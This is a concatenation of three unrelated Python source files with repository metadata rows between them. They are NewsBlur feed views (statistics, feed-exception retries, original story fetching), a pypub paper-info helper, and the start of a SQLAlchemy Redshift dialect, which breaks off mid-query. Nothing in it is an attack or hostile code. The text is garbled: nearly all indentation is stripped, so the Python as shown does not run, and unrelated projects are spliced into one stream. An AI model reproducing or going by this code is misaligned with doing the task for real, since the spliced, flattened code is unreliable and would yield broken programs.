'term': query,
}
else:
return feeds
@ratelimit(minutes=1, requests=30)
@json.json_view
def load_feed_statistics(request, feed_id):
user = get_user(request)
timezone = user.profile.timezone
stats = dict()
feed = get_object_or_404(Feed, pk=feed_id)
feed.update_all_statistics()
feed.set_next_scheduled_update(verbose=True, skip_scheduling=True)
feed.save_feed_story_history_statistics()
feed.save_classifier_counts()
# Dates of last and next update
stats['active'] = feed.active
stats['last_update'] = relative_timesince(feed.last_update)
stats['next_update'] = relative_timeuntil(feed.next_scheduled_update)
stats['push'] = feed.is_push
if feed.is_push:
try:
stats['push_expires'] = localtime_for_timezone(feed.push.lease_expires,
timezone).strftime("%Y-%m-%d %H:%M:%S")
except PushSubscription.DoesNotExist:
stats['push_expires'] = 'Missing push'
feed.is_push = False
feed.save()
# Minutes between updates
update_interval_minutes = feed.get_next_scheduled_update(force=True, verbose=False)
stats['update_interval_minutes'] = update_interval_minutes
original_active_premium_subscribers = feed.active_premium_subscribers
original_premium_subscribers = feed.premium_subscribers
feed.active_premium_subscribers = max(feed.active_premium_subscribers+1, 1)
feed.premium_subscribers += 1
premium_update_interval_minutes = feed.get_next_scheduled_update(force=True, verbose=False,
premium_speed=True)
feed.active_premium_subscribers = original_active_premium_subscribers
feed.premium_subscribers = original_premium_subscribers
stats['premium_update_interval_minutes'] = premium_update_interval_minutes
stats['errors_since_good'] = feed.errors_since_good
# Stories per month - average and month-by-month breakout
average_stories_per_month, story_count_history = feed.average_stories_per_month, feed.data.story_count_history
stats['average_stories_per_month'] = average_stories_per_month
story_count_history = story_count_history and json.decode(story_count_history)
if story_count_history and isinstance(story_count_history, dict):
stats['story_count_history'] = story_count_history['months']
stats['story_days_history'] = story_count_history['days']
stats['story_hours_history'] = story_count_history['hours']
else:
stats['story_count_history'] = story_count_history
# Rotate hours to match user's timezone offset
localoffset = timezone.utcoffset(datetime.datetime.utcnow())
hours_offset = int(localoffset.total_seconds() / 3600)
rotated_hours = {}
for hour, value in stats['story_hours_history'].items():
rotated_hours[str(int(hour)+hours_offset)] = value
stats['story_hours_history'] = rotated_hours
# Subscribers
stats['subscriber_count'] = feed.num_subscribers
stats['num_subscribers'] = feed.num_subscribers
stats['stories_last_month'] = feed.stories_last_month
stats['last_load_time'] = feed.last_load_time
stats['premium_subscribers'] = feed.premium_subscribers
stats['active_subscribers'] = feed.active_subscribers
stats['active_premium_subscribers'] = feed.active_premium_subscribers
# Classifier counts
stats['classifier_counts'] = json.decode(feed.data.feed_classifier_counts)
# Fetch histories
fetch_history = MFetchHistory.feed(feed_id, timezone=timezone)
stats['feed_fetch_history'] = fetch_history['feed_fetch_history']
stats['page_fetch_history'] = fetch_history['page_fetch_history']
stats['feed_push_history'] = fetch_history['push_history']
logging.user(request, "~FBStatistics: ~SB%s" % (feed))
return stats
@json.json_view
def load_feed_settings(request, feed_id):
stats = dict()
feed = get_object_or_404(Feed, pk=feed_id)
user = get_user(request)
timezone = user.profile.timezone
fetch_history = MFetchHistory.feed(feed_id, timezone=timezone)
stats['feed_fetch_history'] = fetch_history['feed_fetch_history']
stats['page_fetch_history'] = fetch_history['page_fetch_history']
stats['feed_push_history'] = fetch_history['push_history']
stats['duplicate_addresses'] = feed.duplicate_addresses.all()
return stats
@ratelimit(minutes=10, requests=10)
@json.json_view
def exception_retry(request):
user = get_user(request)
feed_id = get_argument_or_404(request, 'feed_id')
reset_fetch = json.decode(request.POST['reset_fetch'])
feed = Feed.get_by_id(feed_id)
original_feed = feed
if not feed:
raise Http404
feed.schedule_feed_fetch_immediately()
changed = False
if feed.has_page_exception:
changed = True
feed.has_page_exception = False
if feed.has_feed_exception:
changed = True
feed.has_feed_exception = False
if not feed.active:
changed = True
feed.active = True
if changed:
feed.save(update_fields=['has_page_exception', 'has_feed_exception', 'active'])
original_fetched_once = feed.fetched_once
if reset_fetch:
logging.user(request, "~FRRefreshing exception feed: ~SB%s" % (feed))
feed.fetched_once = False
else:
logging.user(request, "~FRForcing refreshing feed: ~SB%s" % (feed))
feed.fetched_once = True
if feed.fetched_once != original_fetched_once:
feed.save(update_fields=['fetched_once'])
feed = feed.update(force=True, compute_scores=False, verbose=True)
feed = Feed.get_by_id(feed.pk)
try:
usersub = UserSubscription.objects.get(user=user, feed=feed)
except UserSubscription.DoesNotExist:
usersubs = UserSubscription.objects.filter(user=user, feed=original_feed)
if usersubs:
usersub = usersubs[0]
usersub.switch_feed(feed, original_feed)
else:
return {'code': -1}
usersub.calculate_feed_scores(silent=False)
feeds = {feed.pk: usersub and usersub.canonical(full=True), feed_id: usersub.canonical(full=True)}
return {'code': 1, 'feeds': feeds}
@ajax_login_required
@json.json_view
def exception_change_feed_address(request):
feed_id = request.POST['feed_id']
feed = get_object_or_404(Feed, pk=feed_id)
original_feed = feed
feed_address = request.POST['feed_address']
timezone = request.user.profile.timezone
code = -1
if False and (feed.has_page_exception or feed.has_feed_exception):
# Fix broken feed
logging.user(request, "~FRFixing feed exception by address: %s - ~SB%s~SN to ~SB%s" % (feed, feed.feed_address, feed_address))
feed.has_feed_exception = False
feed.active = True
feed.fetched_once = False
feed.feed_address = feed_address
duplicate_feed = feed.schedule_feed_fetch_immediately()
code = 1
if duplicate_feed:
new_feed = Feed.objects.get(pk=duplicate_feed.pk)
feed = new_feed
new_feed.schedule_feed_fetch_immediately()
new_feed.has_feed_exception = False
new_feed.active = True
new_feed = new_feed.save()
if new_feed.pk != feed.pk:
merge_feeds(new_feed.pk, feed.pk)
else:
# Branch good feed
logging.user(request, "~FRBranching feed by address: ~SB%s~SN to ~SB%s" % (feed.feed_address, feed_address))
try:
feed = Feed.objects.get(hash_address_and_link=Feed.generate_hash_address_and_link(feed_address, feed.feed_link))
except Feed.DoesNotExist:
feed = Feed.objects.create(feed_address=feed_address, feed_link=feed.feed_link)
code = 1
if feed.pk != original_feed.pk:
try:
feed.branch_from_feed = original_feed.branch_from_feed or original_feed
except Feed.DoesNotExist:
feed.branch_from_feed = original_feed
feed.feed_address_locked = True
feed = feed.save()
feed = feed.update()
feed = Feed.get_by_id(feed.pk)
try:
usersub = UserSubscription.objects.get(user=request.user, feed=feed)
except UserSubscription.DoesNotExist:
usersubs = UserSubscription.objects.filter(user=request.user, feed=original_feed)
if usersubs:
usersub = usersubs[0]
usersub.switch_feed(feed, original_feed)
else:
fetch_history = MFetchHistory.feed(feed_id, timezone=timezone)
return {
'code': -1,
'feed_fetch_history': fetch_history['feed_fetch_history'],
'page_fetch_history': fetch_history['page_fetch_history'],
'push_history': fetch_history['push_history'],
}
usersub.calculate_feed_scores(silent=False)
feed.update_all_statistics()
classifiers = get_classifiers_for_user(usersub.user, feed_id=usersub.feed_id)
feeds = {
original_feed.pk: usersub and usersub.canonical(full=True, classifiers=classifiers),
}
if feed and feed.has_feed_exception:
code = -1
fetch_history = MFetchHistory.feed(feed_id, timezone=timezone)
return {
'code': code,
'feeds': feeds,
'new_feed_id': usersub.feed_id,
'feed_fetch_history': fetch_history['feed_fetch_history'],
'page_fetch_history': fetch_history['page_fetch_history'],
'push_history': fetch_history['push_history'],
}
@ajax_login_required
@json.json_view
def exception_change_feed_link(request):
feed_id = request.POST['feed_id']
feed = get_object_or_404(Feed, pk=feed_id)
original_feed = feed
feed_link = request.POST['feed_link']
timezone = request.user.profile.timezone
code = -1
if False and (feed.has_page_exception or feed.has_feed_exception):
# Fix broken feed
logging.user(request, "~FRFixing feed exception by link: ~SB%s~SN to ~SB%s" % (feed.feed_link, feed_link))
found_feed_urls = feedfinder.find_feeds(feed_link)
if len(found_feed_urls):
code = 1
feed.has_page_exception = False
feed.active = True
feed.fetched_once = False
feed.feed_link = feed_link
feed.feed_address = found_feed_urls[0]
duplicate_feed = feed.schedule_feed_fetch_immediately()
if duplicate_feed:
new_feed = Feed.objects.get(pk=duplicate_feed.pk)
feed = new_feed
new_feed.schedule_feed_fetch_immediately()
new_feed.has_page_exception = False
new_feed.active = True
new_feed.save()
else:
# Branch good feed
logging.user(request, "~FRBranching feed by link: ~SB%s~SN to ~SB%s" % (feed.feed_link, feed_link))
try:
feed = Feed.objects.get(hash_address_and_link=Feed.generate_hash_address_and_link(feed.feed_address, feed_link))
except Feed.DoesNotExist:
feed = Feed.objects.create(feed_address=feed.feed_address, feed_link=feed_link)
code = 1
if feed.pk != original_feed.pk:
try:
feed.branch_from_feed = original_feed.branch_from_feed or original_feed
except Feed.DoesNotExist:
feed.branch_from_feed = original_feed
feed.feed_link_locked = True
feed.save()
feed = feed.update()
feed = Feed.get_by_id(feed.pk)
try:
usersub = UserSubscription.objects.get(user=request.user, feed=feed)
except UserSubscription.DoesNotExist:
usersubs = UserSubscription.objects.filter(user=request.user, feed=original_feed)
if usersubs:
usersub = usersubs[0]
usersub.switch_feed(feed, original_feed)
else:
fetch_history = MFetchHistory.feed(feed_id, timezone=timezone)
return {
'code': -1,
'feed_fetch_history': fetch_history['feed_fetch_history'],
'page_fetch_history': fetch_history['page_fetch_history'],
'push_history': fetch_history['push_history'],
}
usersub.calculate_feed_scores(silent=False)
feed.update_all_statistics()
classifiers = get_classifiers_for_user(usersub.user, feed_id=usersub.feed_id)
if feed and feed.has_feed_exception:
code = -1
feeds = {
original_feed.pk: usersub.canonical(full=True, classifiers=classifiers),
}
fetch_history = MFetchHistory.feed(feed_id, timezone=timezone)
return {
'code': code,
'feeds': feeds,
'new_feed_id': usersub.feed_id,
'feed_fetch_history': fetch_history['feed_fetch_history'],
'page_fetch_history': fetch_history['page_fetch_history'],
'push_history': fetch_history['push_history'],
}
@login_required
def status(request):
if not request.user.is_staff:
logging.user(request, "~SKNON-STAFF VIEWING RSS FEEDS STATUS!")
assert False
return HttpResponseForbidden()
minutes = int(request.GET.get('minutes', 1))
now = datetime.datetime.now()
hour_ago = now - datetime.timedelta(minutes=minutes)
feeds = Feed.objects.filter(last_update__gte=hour_ago).order_by('-last_update')
return render_to_response('rss_feeds/status.xhtml', {
'feeds': feeds
}, context_instance=RequestContext(request))
@required_params('story_id', feed_id=int)
@json.json_view
def original_text(request):
story_id = request.REQUEST.get('story_id')
feed_id = request.REQUEST.get('feed_id')
story_hash = request.REQUEST.get('story_hash', None)
force = request.REQUEST.get('force', False)
debug = request.REQUEST.get('debug', False)
if story_hash:
story, _ = MStory.find_story(story_hash=story_hash)
else:
story, _ = MStory.find_story(story_id=story_id, story_feed_id=feed_id)
if not story:
logging.user(request, "~FYFetching ~FGoriginal~FY story text: ~FRstory not found")
return {'code': -1, 'message': 'Story not found.', 'original_text': None, 'failed': True}
original_text = story.fetch_original_text(force=force, request=request, debug=debug)
return {
'feed_id': feed_id,
'story_id': story_id,
'original_text': original_text,
'failed': not original_text or len(original_text) < 100,
}
@required_params('story_hash')
def original_story(request):
story_hash = request.REQUEST.get('story_hash')
force = request.REQUEST.get('force', False)
debug = request.REQUEST.get('debug', False)
story, _ = MStory.find_story(story_hash=story_hash)
if not story:
logging.user(request, "~FYFetching ~FGoriginal~FY story page: ~FRstory not found")
return {'code': -1, 'message': 'Story not found.', 'original_page': None, 'failed': True}
original_page = story.fetch_original_page(force=force, request=request, debug=debug)
return HttpResponse(original_page or "")
@required_params('story_hash')
@json.json_view
def story_changes(request):
story_hash = request.REQUEST.get('story_hash', None)
show_changes = is_true(request.REQUEST.get('show_changes', True))
story, _ = MStory.find_story(story_hash=story_hash)
if not story:
logging.user(request, "~FYFetching ~FGoriginal~FY story page: ~FRstory not found")
return {'code': -1, 'message': 'Story not found.', 'original_page': None, 'failed': True}
return {
'story': Feed.format_story(story, show_changes=show_changes)
}
| nriley/NewsBlur | apps/rss_feeds/views.py | Python | mit | 21,500 | 0.005302 |
import pypub.publishers.pub_resolve as pub_resolve
from pypub.paper_info import PaperInfo
def get_paper_info(doi=None, url=None):
"""
Parameters
----------
doi :
url :
Returns
-------
Errors
------
UnsupportedPublisherError : Retrieval of information from this publisher is not yet available
"""
if doi is not None:
publisher = pub_resolve.publisher_from_doi(doi)
paper_info = publisher.get_paper_info(doi=doi)
elif url is not None:
publisher = pub_resolve.publisher_from_url(url)
paper_info = publisher.get_paper_info(url=url)
else:
        raise Exception('Either doi or url must be provided.')
'''
# Resolve DOI or URL through PyPub pub_resolve methods
publisher_base_url, full_url = pub_resolve.get_publisher_urls(doi=doi, url=url)
pub_dict = pub_resolve.get_publisher_site_info(publisher_base_url)
# Create a PaperInfo object to hold all information and call appropriate scraper
paper_info = PaperInfo(doi=doi, scraper_obj=pub_dict['object'], url=full_url)
paper_info.populate_info()
'''
return paper_info
def get_references():
pass
def get_publisher(doi=None, url=None):
#This could return the publisher given this information.
#This function is low priority
pass
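if __name__ == '__main__':
    # Usage sketch (not part of the original module); the DOI below is a
    # placeholder, not a real identifier.
    info = get_paper_info(doi='10.1000/example')
    print(info)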
| ScholarTools/pypub | pypub/entry_functions.py | Python | mit | 1,300 | 0.009231 |
from collections import defaultdict
import numbers
import pkg_resources
import re
import sqlalchemy as sa
from sqlalchemy import schema, exc, inspect, Column
from sqlalchemy.dialects.postgresql.base import PGDDLCompiler, PGCompiler
from sqlalchemy.dialects.postgresql.psycopg2 import PGDialect_psycopg2
from sqlalchemy.engine import reflection
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.sql.expression import BindParameter, Executable, ClauseElement
from sqlalchemy.types import VARCHAR, NullType
try:
from alembic.ddl import postgresql
except ImportError:
pass
else:
from alembic.ddl.base import RenameTable
compiles(RenameTable, 'redshift')(postgresql.visit_rename_table)
class RedshiftImpl(postgresql.PostgresqlImpl):
__dialect__ = 'redshift'
# Regex for parsing and identity constraint out of adsrc, e.g.:
# "identity"(445178, 0, '1,1'::text)
IDENTITY_RE = re.compile(r"""
"identity" \(
(?P<current>-?\d+)
,\s
(?P<base>-?\d+)
,\s
'(?P<seed>-?\d+),(?P<step>-?\d+)'
.*
\)
""", re.VERBOSE)
# Regex for SQL identifiers (valid table and column names)
SQL_IDENTIFIER_RE = re.compile(r"""
[_a-zA-Z][\w$]* # SQL standard identifier
| # or
(?:"[^"]+")+ # SQL delimited (quoted) identifier
""", re.VERBOSE)
# Regex for foreign key constraints, e.g.:
# FOREIGN KEY(col1) REFERENCES othertable (col2)
# See https://docs.aws.amazon.com/redshift/latest/dg/r_names.html
# for a definition of valid SQL identifiers.
FOREIGN_KEY_RE = re.compile(r"""
^FOREIGN\ KEY \s* \( # FOREIGN KEY, arbitrary whitespace, literal '('
(?P<columns> # Start a group to capture the referring columns
(?: # Start a non-capturing group
\s* # Arbitrary whitespace
([_a-zA-Z][\w$]* | ("[^"]+")+) # SQL identifier
\s* # Arbitrary whitespace
            ,? # There will be a comma if this isn't the last one
)+ # Close the non-capturing group; require at least one
) # Close the 'columns' group
\s* \) # Arbitrary whitespace and literal ')'
\s* REFERENCES \s*
(?P<referred_table> # Start a group to capture the referred table name
([_a-zA-Z][\w$]* | ("[^"]*")+) # SQL identifier
)
\s* \( \s* # Literal '(' surrounded by arbitrary whitespace
(?P<referred_column> # Start a group to capture the referred column name
([_a-zA-Z][\w$]* | ("[^"]*")+) # SQL identifier
)
\s* \) # Arbitrary whitespace and literal ')'
""", re.VERBOSE)
# Regex for primary key constraints, e.g.:
# PRIMARY KEY (col1, col2)
PRIMARY_KEY_RE = re.compile(r"""
    ^PRIMARY \s* KEY \s* \( # PRIMARY KEY, arbitrary whitespace, literal '('
(?P<columns> # Start a group to capture column names
(?:
\s* # Arbitrary whitespace
( [_a-zA-Z][\w$]* | ("[^"]*")+ ) # SQL identifier or delimited identifier
\s* # Arbitrary whitespace
            ,? # There will be a comma if this isn't the last one
)+ # Close the non-capturing group; require at least one
)
\s* \) \s* # Arbitrary whitespace and literal ')'
""", re.VERBOSE)
def _get_relation_key(name, schema):
if schema is None:
return name
else:
return schema + "." + name
def _get_schema_and_relation(key):
if '.' not in key:
return (None, key)
identifiers = SQL_IDENTIFIER_RE.findall(key)
if len(identifiers) == 1:
return (None, key)
elif len(identifiers) == 2:
return identifiers
    raise ValueError("%s does not look like a valid relation identifier" % key)
def unquoted(key):
"""
Return *key* with one level of double quotes removed.
Redshift stores some identifiers without quotes in internal tables,
even though the name must be quoted elsewhere.
In particular, this happens for tables named as a keyword.
"""
if key.startswith('"') and key.endswith('"'):
return key[1:-1]
return key
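def _example_relation_key_helpers():
    """
    Usage sketch (not part of the original module) for the helpers above;
    the expected values follow directly from the definitions.
    """
    assert _get_relation_key('users', 'analytics') == 'analytics.users'
    assert _get_schema_and_relation('analytics.users') == ['analytics', 'users']
    assert unquoted('"select"') == 'select'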
class RedshiftCompiler(PGCompiler):
def visit_now_func(self, fn, **kw):
return "SYSDATE"
class RedShiftDDLCompiler(PGDDLCompiler):
"""
Handles Redshift-specific CREATE TABLE syntax.
Users can specify the DISTSTYLE, DISTKEY, SORTKEY and ENCODE properties per
table and per column.
Table level properties can be set using the dialect specific syntax. For
example, to specify a distribution key and style you apply the following ::
>>> import sqlalchemy as sa
>>> from sqlalchemy.schema import CreateTable
>>> engine = sa.create_engine('redshift+psycopg2://example')
>>> metadata = sa.MetaData()
>>> user = sa.Table(
... 'user',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column('name', sa.String),
... redshift_diststyle='KEY',
... redshift_distkey='id',
... redshift_interleaved_sortkey=['id', 'name'],
... )
>>> print(CreateTable(user).compile(engine))
<BLANKLINE>
CREATE TABLE "user" (
id INTEGER NOT NULL,
name VARCHAR,
PRIMARY KEY (id)
) DISTSTYLE KEY DISTKEY (id) INTERLEAVED SORTKEY (id, name)
<BLANKLINE>
<BLANKLINE>
A single sort key can be applied without a wrapping list ::
>>> customer = sa.Table(
... 'customer',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column('name', sa.String),
... redshift_sortkey='id',
... )
>>> print(CreateTable(customer).compile(engine))
<BLANKLINE>
CREATE TABLE customer (
id INTEGER NOT NULL,
name VARCHAR,
PRIMARY KEY (id)
) SORTKEY (id)
<BLANKLINE>
<BLANKLINE>
Column-level special syntax can also be applied using the column info
dictionary. For example, we can specify the ENCODE for a column ::
>>> product = sa.Table(
... 'product',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column('name', sa.String, info={'encode': 'lzo'})
... )
>>> print(CreateTable(product).compile(engine))
<BLANKLINE>
CREATE TABLE product (
id INTEGER NOT NULL,
name VARCHAR ENCODE lzo,
PRIMARY KEY (id)
)
<BLANKLINE>
<BLANKLINE>
We can also specify the distkey and sortkey options ::
>>> sku = sa.Table(
... 'sku',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column(
... 'name', sa.String, info={'distkey': True, 'sortkey': True}
... )
... )
>>> print(CreateTable(sku).compile(engine))
<BLANKLINE>
CREATE TABLE sku (
id INTEGER NOT NULL,
name VARCHAR DISTKEY SORTKEY,
PRIMARY KEY (id)
)
<BLANKLINE>
<BLANKLINE>
"""
def post_create_table(self, table):
text = ""
info = table.dialect_options['redshift']
diststyle = info.get('diststyle')
if diststyle:
diststyle = diststyle.upper()
if diststyle not in ('EVEN', 'KEY', 'ALL'):
raise exc.CompileError(
u"diststyle {0} is invalid".format(diststyle)
)
text += " DISTSTYLE " + diststyle
distkey = info.get('distkey')
if distkey:
text += " DISTKEY ({0})".format(distkey)
sortkey = info.get('sortkey')
interleaved_sortkey = info.get('interleaved_sortkey')
if sortkey and interleaved_sortkey:
raise exc.ArgumentError(
"Parameters sortkey and interleaved_sortkey are "
"mutually exclusive; you may not specify both."
)
if sortkey or interleaved_sortkey:
if isinstance(sortkey, str):
keys = [sortkey]
else:
keys = sortkey or interleaved_sortkey
keys = [key.name if isinstance(key, Column) else key
for key in keys]
if interleaved_sortkey:
text += " INTERLEAVED"
text += " SORTKEY ({0})".format(", ".join(keys))
return text
def get_column_specification(self, column, **kwargs):
colspec = self.preparer.format_column(column)
colspec += " " + self.dialect.type_compiler.process(column.type)
default = self.get_column_default_string(column)
if default is not None:
# Identity constraints show up as *default* when reflected.
m = IDENTITY_RE.match(default)
if m:
colspec += " IDENTITY({seed},{step})".format(**m.groupdict())
else:
colspec += " DEFAULT " + default
colspec += self._fetch_redshift_column_attributes(column)
if not column.nullable:
colspec += " NOT NULL"
return colspec
def _fetch_redshift_column_attributes(self, column):
text = ""
if not hasattr(column, 'info'):
return text
info = column.info
identity = info.get('identity')
if identity:
text += " IDENTITY({0},{1})".format(identity[0], identity[1])
encode = info.get('encode')
if encode:
text += " ENCODE " + encode
distkey = info.get('distkey')
if distkey:
text += " DISTKEY"
sortkey = info.get('sortkey')
if sortkey:
text += " SORTKEY"
return text
class RedshiftDialect(PGDialect_psycopg2):
"""
Define Redshift-specific behavior.
Most public methods are overrides of the underlying interfaces defined in
:class:`~sqlalchemy.engine.interfaces.Dialect` and
:class:`~sqlalchemy.engine.Inspector`.
"""
name = 'redshift'
statement_compiler = RedshiftCompiler
ddl_compiler = RedShiftDDLCompiler
construct_arguments = [
(schema.Index, {
"using": False,
"where": None,
"ops": {}
}),
(schema.Table, {
"ignore_search_path": False,
"diststyle": None,
"distkey": None,
"sortkey": None,
"interleaved_sortkey": None,
}),
]
def __init__(self, *args, **kw):
super(RedshiftDialect, self).__init__(*args, **kw)
# Cache domains, as these will be static;
# Redshift does not support user-created domains.
self._domains = None
@reflection.cache
def get_columns(self, connection, table_name, schema=None, **kw):
"""
Return information about columns in `table_name`.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_columns`.
"""
cols = self._get_redshift_columns(connection, table_name, schema, **kw)
if not self._domains:
self._domains = self._load_domains(connection)
domains = self._domains
columns = []
for col in cols:
column_info = self._get_column_info(
name=col.name, format_type=col.format_type,
default=col.default, notnull=col.notnull, domains=domains,
enums=[], schema=col.schema, encode=col.encode)
columns.append(column_info)
return columns
@reflection.cache
def get_pk_constraint(self, connection, table_name, schema=None, **kw):
"""
Return information about the primary key constraint on `table_name`.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_pk_constraint`.
"""
constraints = self._get_redshift_constraints(connection, table_name,
schema)
pk_constraints = [c for c in constraints if c.contype == 'p']
if not pk_constraints:
return {'constrained_columns': [], 'name': ''}
pk_constraint = pk_constraints[0]
m = PRIMARY_KEY_RE.match(pk_constraint.condef)
colstring = m.group('columns')
constrained_columns = SQL_IDENTIFIER_RE.findall(colstring)
return {
'constrained_columns': constrained_columns,
'name': None,
}
@reflection.cache
def get_foreign_keys(self, connection, table_name, schema=None, **kw):
"""
Return information about foreign keys in `table_name`.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_pk_constraint`.
"""
constraints = self._get_redshift_constraints(connection, table_name,
schema)
fk_constraints = [c for c in constraints if c.contype == 'f']
fkeys = []
for constraint in fk_constraints:
m = FOREIGN_KEY_RE.match(constraint.condef)
referred_column = m.group('referred_column')
referred_columns = [referred_column]
referred_table = m.group('referred_table')
referred_table, _, referred_schema = referred_table.partition('.')
colstring = m.group('columns')
constrained_columns = SQL_IDENTIFIER_RE.findall(colstring)
fkey_d = {
'name': None,
'constrained_columns': constrained_columns,
'referred_schema': referred_schema or None,
'referred_table': referred_table,
'referred_columns': referred_columns,
}
fkeys.append(fkey_d)
return fkeys
@reflection.cache
def get_table_names(self, connection, schema=None, **kw):
"""
Return a list of table names for `schema`.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_table_names`.
"""
default_schema = inspect(connection).default_schema_name
if not schema:
schema = default_schema
info_cache = kw.get('info_cache')
all_tables, _ = self._get_all_table_and_view_info(connection,
info_cache=info_cache)
table_names = []
for key in all_tables.keys():
this_schema, this_table = _get_schema_and_relation(key)
if this_schema is None:
this_schema = default_schema
if this_schema == schema:
table_names.append(this_table)
return table_names
@reflection.cache
def get_view_names(self, connection, schema=None, **kw):
"""
Return a list of all view names available in the database.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_view_names`.
"""
default_schema = inspect(connection).default_schema_name
if not schema:
            schema = default_schema
info_cache = kw.get('info_cache')
_, all_views = self._get_all_table_and_view_info(connection,
info_cache=info_cache)
view_names = []
for key in all_views.keys():
this_schema, this_view = _get_schema_and_relation(key)
if this_schema is None:
this_schema = default_schema
if this_schema == schema:
view_names.append(this_view)
return view_names
@reflection.cache
def get_view_definition(self, connection, view_name, schema=None, **kw):
"""Return view definition.
Given a :class:`.Connection`, a string `view_name`,
and an optional string `schema`, return the view definition.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_view_definition`.
"""
view = self._get_redshift_view(connection, view_name, schema, **kw)
return view.view_definition
def get_indexes(self, connection, table_name, schema, **kw):
"""
Return information about indexes in `table_name`.
Because Redshift does not support traditional indexes,
this always returns an empty list.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_indexes`.
"""
return []
@reflection.cache
def get_unique_constraints(self, connection, table_name,
schema=None, **kw):
"""
Return information about unique constraints in `table_name`.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.get_unique_constraints`.
"""
constraints = self._get_redshift_constraints(connection,
table_name, schema)
constraints = [c for c in constraints if c.contype == 'u']
uniques = defaultdict(lambda: defaultdict(dict))
for con in constraints:
uniques[con.conname]["key"] = con.conkey
uniques[con.conname]["cols"][con.attnum] = con.attname
return [
{'name': None,
'column_names': [uc["cols"][i] for i in uc["key"]]}
for name, uc in uniques.items()
]
@reflection.cache
def get_table_options(self, connection, table_name, schema, **kw):
"""
Return a dictionary of options specified when the table of the
given name was created.
See :meth:`~sqlalchemy.engine.Inspector.get_table_options`.
"""
def keyfunc(column):
num = int(column.sortkey)
            # Interleaved sort keys are stored with negative column
            # numbers, so take the absolute value.
return abs(num)
table = self._get_redshift_table(connection, table_name,
schema, **kw)
columns = self._get_redshift_columns(connection, table_name,
schema, **kw)
sortkey_cols = sorted([col for col in columns if col.sortkey],
key=keyfunc)
        interleaved = any(int(col.sortkey) < 0 for col in sortkey_cols)
sortkey = [col.name for col in sortkey_cols]
interleaved_sortkey = None
if interleaved:
interleaved_sortkey = sortkey
sortkey = None
distkeys = [col.name for col in columns if col.distkey]
distkey = distkeys[0] if distkeys else None
return {
'redshift_diststyle': table.diststyle,
'redshift_distkey': distkey,
'redshift_sortkey': sortkey,
'redshift_interleaved_sortkey': interleaved_sortkey,
}
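    # Illustrative return value (table and column names are made up) for a
    # table created with DISTSTYLE KEY, DISTKEY(id) and SORTKEY(created, id):
    #     {'redshift_diststyle': 'KEY',
    #      'redshift_distkey': 'id',
    #      'redshift_sortkey': ['created', 'id'],
    #      'redshift_interleaved_sortkey': None}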
def create_connect_args(self, *args, **kwargs):
"""
Build DB-API compatible connection arguments.
See :meth:`~sqlalchemy.engine.interfaces.Dialect.create_connect_args`.
"""
default_args = {
'sslmode': 'verify-full',
'sslrootcert': pkg_resources.resource_filename(
__name__,
'redshift-ssl-ca-cert.pem'
),
}
cargs, cparams = super(RedshiftDialect, self).create_connect_args(
*args, **kwargs
)
default_args.update(cparams)
return cargs, default_args
def _get_column_info(self, *args, **kwargs):
kw = kwargs.copy()
encode = kw.pop('encode', None)
column_info = super(RedshiftDialect, self)._get_column_info(
*args,
**kw
)
if isinstance(column_info['type'], VARCHAR):
if column_info['type'].length is None:
column_info['type'] = NullType()
if 'info' not in column_info:
column_info['info'] = {}
if encode and encode != 'none':
column_info['info']['encode'] = encode
return column_info
def _get_redshift_table(self, connection, table_name, schema=None, **kw):
info_cache = kw.get('info_cache')
all_tables, _ = self._get_all_table_and_view_info(
connection, info_cache=info_cache)
key = _get_relation_key(table_name, schema)
if key not in all_tables.keys():
key = unquoted(key)
return all_tables[key]
def _get_redshift_view(self, connection, view_name, schema=None, **kw):
info_cache = kw.get('info_cache')
_, all_views = self._get_all_table_and_view_info(connection,
info_cache=info_cache)
key = _get_relation_key(view_name, schema)
if key not in all_views.keys():
key = unquoted(key)
return all_views[key]
def _get_redshift_columns(self, connection, table_name, schema=None, **kw):
info_cache = kw.get('info_cache')
all_columns = self._get_all_column_info(connection,
info_cache=info_cache)
key = _get_relation_key(table_name, schema)
if key not in all_columns.keys():
key = unquoted(key)
return all_columns[key]
def _get_redshift_constraints(self, connection, table_name,
schema=None, **kw):
info_cache = kw.get('info_cache')
all_constraints = self._get_all_constraint_info(connection,
info_cache=info_cache)
key = _get_relation_key(table_name, schema)
if key not in all_constraints.keys():
key = unquoted(key)
return all_constraints[key]
@reflection.cache
def _get_all_table_and_view_info(self, connection, **kw):
result = connection.execute("""
SELECT
c.relkind,
n.oid as "schema_oid",
n.nspname as "schema",
c.oid as "rel_oid",
c.relname,
CASE c.reldiststyle
WHEN 0 THEN 'EVEN' WHEN 1 THEN 'KEY' WHEN 8 THEN 'ALL' END
AS "diststyle",
c.relowner AS "owner_id",
u.usename AS "owner_name",
pg_get_viewdef(c.oid) AS "view_definition",
pg_catalog.array_to_string(c.relacl, '\n') AS "privileges"
FROM pg_catalog.pg_class c
LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace
JOIN pg_catalog.pg_user u ON u.usesysid = c.relowner
WHERE c.relkind IN ('r', 'v', 'm', 'S', 'f')
AND n.nspname !~ '^pg_' AND pg_catalog.pg_table_is_visible(c.oid)
ORDER BY c.relkind, n.oid, n.nspname;
""")
tables, views = {}, {}
for rel in result:
schema = rel.schema
if schema == inspect(connection).default_schema_name:
schema = None
key = _get_relation_key(rel.relname, schema)
if rel.relkind == 'r':
tables[key] = rel
if rel.relkind == 'v':
views[key] = rel
self._all_tables_and_views = (tables, views)
return self._all_tables_and_views
@reflection.cache
def _get_all_column_info(self, connection, **kw):
result = connection.execute("""
SELECT
n.nspname as "schema",
c.relname as "table_name",
d.column as "name",
encoding as "encode",
type, distkey, sortkey, "notnull", adsrc, attnum,
pg_catalog.format_type(att.atttypid, att.atttypmod),
pg_catalog.pg_get_expr(ad.adbin, ad.adrelid) AS DEFAULT,
